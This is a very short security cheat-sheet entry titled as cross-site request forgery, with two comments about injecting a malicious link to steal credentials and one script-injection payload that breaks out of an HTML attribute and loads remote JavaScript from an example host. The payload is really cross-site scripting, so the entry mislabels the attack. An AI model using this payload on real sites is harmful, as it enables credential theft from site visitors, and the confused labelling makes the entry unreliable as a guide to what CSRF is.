Cross-Site Request Forgery (CSRF)

# Injects a malicious link into the website 
# Then replicate the js code their to exploit some credentials
"><script src=//www.example.com/exploit.js></script>

Last updated